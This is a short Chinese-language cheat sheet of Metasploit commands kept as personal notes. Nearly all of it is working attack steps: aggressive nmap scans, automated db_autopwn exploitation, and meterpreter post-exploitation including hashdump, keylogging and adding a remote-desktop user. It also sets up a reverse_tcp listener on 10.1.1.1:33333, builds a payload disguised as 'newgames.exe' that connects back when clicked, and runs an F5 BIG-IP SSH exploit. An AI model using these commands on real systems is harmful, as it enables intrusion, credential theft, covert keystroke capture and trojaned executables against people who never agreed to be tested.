msf metasploit一些常用命令
笔记上记得 先放上来 慢慢补充
rdesktop ip 远程桌面
msfconsole
hosts 数据库
host -d 删除所有数据
db_nmap -T Aggressive -sV -n -O -v
nmap -sS -Pn 192.168.1.1 // -sS 使用它来进行一次隐蔽的TCP 扫描 -Pn 它会告诉nmap 不使用ping 来预先确认主机属否存活
调用nmap扫描 -T Aggressive 快速扫描 -o判断造作系统 -sv服务及版本 -v 详细消息
db_service 查看服务
load db_autopwn.rb
db_autopwn 自动攻击 db_autopwn -p -t -e -I指定目标
db_autopwn -p -t -e -r
-e 是开始攻击,-t 是列出所有的匹配的模块,-r 是使用一个反弹式的
shell –p 是在端口的基础上来选择攻击模块
sessions -i 查看活动连接
sessions -i id 连接
getuid 查看权限
sysinfo 查看系统信息
run hashdump 导出帐号
ps 查看系统进程
migrate 进程uid 进入某个进程 迁移进程
keyscan_start 键盘扫描 键盘记录
keyscan_dump 输出键盘记录
keyscan_stop
run getgui -e 打开远程桌面
run getgui -u 用户名 -p 密码 添加用户
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 反向tcp连接
set LHOST 10.1.1.1
set LPORT 33333
exploit
制造离线攻击
cd /pentest/exploits/frameworks3
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=33333 X > /tmp/newgames.exe
建立文件 点击后 自动连接 10.1.1.1 33333端口
选择模块攻击
search 关键词
use exploit/linux/ssh/f5_bigip_known_privkey
show options
set RHOST ip
set RPORT 端口
set payload cmd/unix/interact
exploit